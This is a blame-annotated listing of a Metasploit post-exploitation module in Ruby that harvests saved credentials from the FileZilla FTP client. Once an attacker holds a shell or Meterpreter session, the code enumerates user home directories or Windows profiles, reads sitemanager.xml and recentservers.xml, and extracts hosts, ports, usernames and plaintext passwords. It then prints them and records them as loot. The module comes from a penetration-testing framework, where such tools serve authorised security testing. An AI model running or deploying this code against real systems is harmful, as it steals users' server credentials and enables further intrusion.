2011-03-02 04:11:12 +00:00
|
|
|
##
|
|
|
|
# $Id$
|
|
|
|
##
|
|
|
|
|
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
|
|
# Framework web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/framework/
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
require 'rex'
|
|
|
|
require 'rexml/document'
|
2011-03-03 18:32:46 +00:00
|
|
|
require 'msf/core/post/file'
|
2011-11-15 20:19:15 +00:00
|
|
|
require 'msf/core/post/windows/user_profiles'
|
2011-03-02 04:11:12 +00:00
|
|
|
|
|
|
|
class Metasploit3 < Msf::Post
|
|
|
|
|
|
|
|
include Msf::Post::File
|
2011-11-15 20:19:15 +00:00
|
|
|
include Msf::Post::Windows::UserProfiles
|
2011-03-02 04:11:12 +00:00
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super( update_info(info,
|
2011-04-27 16:25:15 +00:00
|
|
|
'Name' => 'Multi Gather FileZilla FTP Client Credential Collection',
|
2011-07-27 02:39:49 +00:00
|
|
|
'Description' => %q{ This module will collect credentials from the FileZilla FTP client if it is installed. },
|
2011-03-02 04:11:12 +00:00
|
|
|
'License' => MSF_LICENSE,
|
2011-10-17 03:49:49 +00:00
|
|
|
'Author' =>
|
2011-03-02 04:11:12 +00:00
|
|
|
[
|
|
|
|
'bannedit', # post port, added support for shell sessions
|
|
|
|
'Carlos Perez <carlos_perez[at]darkoperator.com>' # original meterpreter script
|
|
|
|
],
|
|
|
|
'Version' => '$Revision$',
|
|
|
|
'Platform' => ['unix', 'bsd', 'linux', 'osx', 'windows'],
|
|
|
|
'SessionTypes' => ['shell', 'meterpreter' ]
|
|
|
|
))
|
|
|
|
end
|
|
|
|
|
|
|
|
def run
|
2011-11-15 20:19:15 +00:00
|
|
|
paths = []
|
2011-03-02 04:11:12 +00:00
|
|
|
case session.platform
|
|
|
|
when /unix|linux|bsd/
|
|
|
|
@platform = :unix
|
|
|
|
paths = enum_users_unix
|
|
|
|
when /osx/
|
|
|
|
@platform = :osx
|
|
|
|
paths = enum_users_unix
|
|
|
|
when /win/
|
2011-11-15 20:19:15 +00:00
|
|
|
profiles = grab_user_profiles()
|
|
|
|
profiles.each do |user|
|
|
|
|
next if user['AppData'] == nil
|
|
|
|
fzdir = check_filezilla(user['AppData'])
|
|
|
|
paths << fzdir if fzdir
|
2011-03-02 04:11:12 +00:00
|
|
|
end
|
2011-11-15 20:19:15 +00:00
|
|
|
|
2011-03-02 04:11:12 +00:00
|
|
|
else
|
|
|
|
print_error "Unsupported platform #{session.platform}"
|
|
|
|
return
|
|
|
|
end
|
2011-10-16 23:23:57 +00:00
|
|
|
if paths.nil? or paths.empty?
|
2011-03-02 04:11:12 +00:00
|
|
|
print_status("No users found with a FileZilla directory")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
get_filezilla_creds(paths)
|
|
|
|
end
|
|
|
|
|
|
|
|
def enum_users_unix
|
|
|
|
if @platform == :osx
|
|
|
|
home = "/Users/"
|
|
|
|
else
|
|
|
|
home = "/home/"
|
|
|
|
end
|
|
|
|
|
|
|
|
if got_root?
|
2011-04-18 14:31:01 +00:00
|
|
|
userdirs = session.shell_command("ls #{home}").gsub(/\s/, "\n")
|
2011-03-02 04:11:12 +00:00
|
|
|
userdirs << "/root\n"
|
|
|
|
else
|
2011-04-18 14:31:01 +00:00
|
|
|
userdirs = session.shell_command("ls #{home}#{whoami}/.filezilla")
|
2011-03-02 04:11:12 +00:00
|
|
|
if userdirs =~ /No such file/i
|
2011-10-17 03:49:49 +00:00
|
|
|
return
|
2011-03-02 04:11:12 +00:00
|
|
|
else
|
|
|
|
print_status("Found FileZilla Client profile for: #{whoami}")
|
2011-10-17 03:49:49 +00:00
|
|
|
return ["#{home}#{whoami}/.filezilla"]
|
2011-03-02 04:11:12 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
paths = Array.new
|
|
|
|
userdirs.each_line do |dir|
|
|
|
|
dir.chomp!
|
|
|
|
next if dir == "." || dir == ".."
|
|
|
|
|
|
|
|
dir = "#{home}#{dir}" if dir !~ /root/
|
|
|
|
print_status("Checking for FileZilla Client profile in: #{dir}")
|
|
|
|
|
2011-04-18 14:31:01 +00:00
|
|
|
stat = session.shell_command("ls #{dir}/.filezilla/sitemanager.xml")
|
2011-03-02 04:11:12 +00:00
|
|
|
next if stat =~ /No such file/i
|
|
|
|
paths << "#{dir}/.filezilla"
|
|
|
|
end
|
|
|
|
return paths
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
def check_filezilla(filezilladir)
|
|
|
|
print_status("Checking for Filezilla directory in: #{filezilladir}")
|
|
|
|
session.fs.dir.foreach(filezilladir) do |dir|
|
|
|
|
if dir =~ /FileZilla/
|
|
|
|
print_status("Found #{filezilladir}#{dir}")
|
|
|
|
return "#{filezilladir}#{dir}"
|
|
|
|
end
|
|
|
|
end
|
|
|
|
return nil
|
|
|
|
end
|
|
|
|
|
|
|
|
def get_filezilla_creds(paths)
|
|
|
|
|
|
|
|
sitedata = ""
|
|
|
|
recentdata = ""
|
|
|
|
creds = []
|
|
|
|
|
|
|
|
paths.each do |path|
|
|
|
|
print_status("Reading sitemanager.xml and recentservers.xml files from #{path}")
|
|
|
|
if session.type == "shell"
|
|
|
|
type = :shell
|
2011-04-18 14:31:01 +00:00
|
|
|
sites = session.shell_command("cat #{path}/sitemanager.xml")
|
|
|
|
recents = session.shell_command("cat #{path}/recentservers.xml")
|
2011-09-11 02:42:39 +00:00
|
|
|
print_status("recents: #{recents}")
|
2011-03-02 04:11:12 +00:00
|
|
|
creds = [parse_accounts(sites)]
|
|
|
|
creds << parse_accounts(recents) unless recents =~ /No such file/i
|
|
|
|
else
|
|
|
|
type = :meterp
|
2011-07-28 22:39:28 +00:00
|
|
|
sitexml = "#{path}\\sitemanager.xml"
|
|
|
|
present = session.fs.file.stat(sitexml) rescue nil
|
|
|
|
if present
|
|
|
|
sites = session.fs.file.new(sitexml, "rb")
|
|
|
|
until sites.eof?
|
|
|
|
sitedata << sites.read
|
|
|
|
end
|
|
|
|
sites.close
|
2011-10-16 04:39:28 +00:00
|
|
|
print_status("Parsing sitemanager.xml")
|
2011-07-28 22:39:28 +00:00
|
|
|
creds = [parse_accounts(sitedata)]
|
|
|
|
else
|
|
|
|
print_status("No saved connections where found")
|
2011-03-02 04:11:12 +00:00
|
|
|
end
|
|
|
|
|
2011-07-28 22:39:28 +00:00
|
|
|
recent_file = "#{path}\\recentservers.xml"
|
|
|
|
recent_present = session.fs.file.stat(recent_file) rescue nil
|
|
|
|
if recent_present
|
|
|
|
recents = session.fs.file.new(recent_file, "rb")
|
|
|
|
until recents.eof?
|
|
|
|
recentdata << recents.read
|
|
|
|
end
|
|
|
|
recents.close
|
2011-10-16 04:39:28 +00:00
|
|
|
print_status("Parsing recentservers.xml")
|
2011-07-28 22:39:28 +00:00
|
|
|
creds << parse_accounts(recentdata)
|
|
|
|
else
|
|
|
|
print_status("No recent connections where found.")
|
2011-03-02 04:11:12 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
creds.each do |cred|
|
|
|
|
cred.each do |loot|
|
2011-11-15 20:19:15 +00:00
|
|
|
report_auth_info(
|
|
|
|
:host => loot['host'],
|
|
|
|
:port => loot['port'],
|
|
|
|
:sname => 'FTP',
|
|
|
|
:source_id => session.db_record.id,
|
|
|
|
:source_type => "exploit",
|
|
|
|
:user => loot['user'],
|
|
|
|
:pass => loot['password'])
|
2011-03-02 04:11:12 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
def parse_accounts(data)
|
|
|
|
creds = []
|
2011-10-16 04:39:28 +00:00
|
|
|
|
|
|
|
doc = REXML::Document.new(data).root rescue nil
|
|
|
|
return [] if doc.nil?
|
|
|
|
|
2011-10-17 03:49:49 +00:00
|
|
|
doc.elements.to_a("//Server").each do |sub|
|
2011-03-02 04:11:12 +00:00
|
|
|
account = {}
|
|
|
|
account['host'] = sub.elements['Host'].text rescue "<unknown>"
|
|
|
|
account['port'] = sub.elements['Port'].text rescue "<unknown>"
|
|
|
|
|
|
|
|
case sub.elements['Logontype'].text
|
|
|
|
when "0"
|
|
|
|
account['logontype'] = "Anonymous"
|
|
|
|
when /1|4/
|
|
|
|
account['user'] = sub.elements['User'].text rescue "<unknown>"
|
|
|
|
account['password'] = sub.elements['Pass'].text rescue "<unknown>"
|
|
|
|
when /2|3/
|
|
|
|
account['user'] = sub.elements['User'].text rescue "<unknown>"
|
|
|
|
account['password'] = "<blank>"
|
|
|
|
end
|
|
|
|
|
|
|
|
if account['user'].nil?
|
|
|
|
account['user'] = "<blank>"
|
|
|
|
end
|
|
|
|
if account['password'].nil?
|
|
|
|
account['password'] = "<blank>"
|
|
|
|
end
|
|
|
|
|
2011-10-17 03:49:49 +00:00
|
|
|
case sub.elements['Protocol'].text
|
2011-03-02 04:11:12 +00:00
|
|
|
when "0"
|
|
|
|
account['protocol'] = "FTP"
|
|
|
|
when "1"
|
|
|
|
account['protocol'] = "SSH"
|
|
|
|
when "3"
|
|
|
|
account['protocol'] = "FTPS"
|
|
|
|
when "4"
|
|
|
|
account['protocol'] = "FTPES"
|
|
|
|
end
|
|
|
|
creds << account
|
|
|
|
|
|
|
|
print_status(" Collected the following credentials:")
|
|
|
|
print_status(" Server: %s:%s" % [account['host'], account['port']])
|
|
|
|
print_status(" Protocol: %s" % account['protocol'])
|
|
|
|
print_status(" Username: %s" % account['user'])
|
|
|
|
print_status(" Password: %s" % account['password'])
|
|
|
|
print_line("")
|
|
|
|
end
|
|
|
|
return creds
|
|
|
|
end
|
|
|
|
|
|
|
|
def got_root?
|
|
|
|
case @platform
|
|
|
|
when :windows
|
|
|
|
if session.sys.config.getuid =~ /SYSTEM/
|
|
|
|
return true
|
|
|
|
else
|
|
|
|
return false
|
|
|
|
end
|
|
|
|
else # unix, bsd, linux, osx
|
|
|
|
ret = whoami
|
|
|
|
if ret =~ /root/
|
|
|
|
return true
|
|
|
|
else
|
|
|
|
return false
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def whoami
|
|
|
|
if @platform == :windows
|
|
|
|
session.fs.file.expand_path("%USERNAME%")
|
|
|
|
else
|
2011-04-18 14:31:01 +00:00
|
|
|
session.shell_command("whoami").chomp
|
2011-03-02 04:11:12 +00:00
|
|
|
end
|
|
|
|
end
|
2011-03-03 18:32:46 +00:00
|
|
|
end
|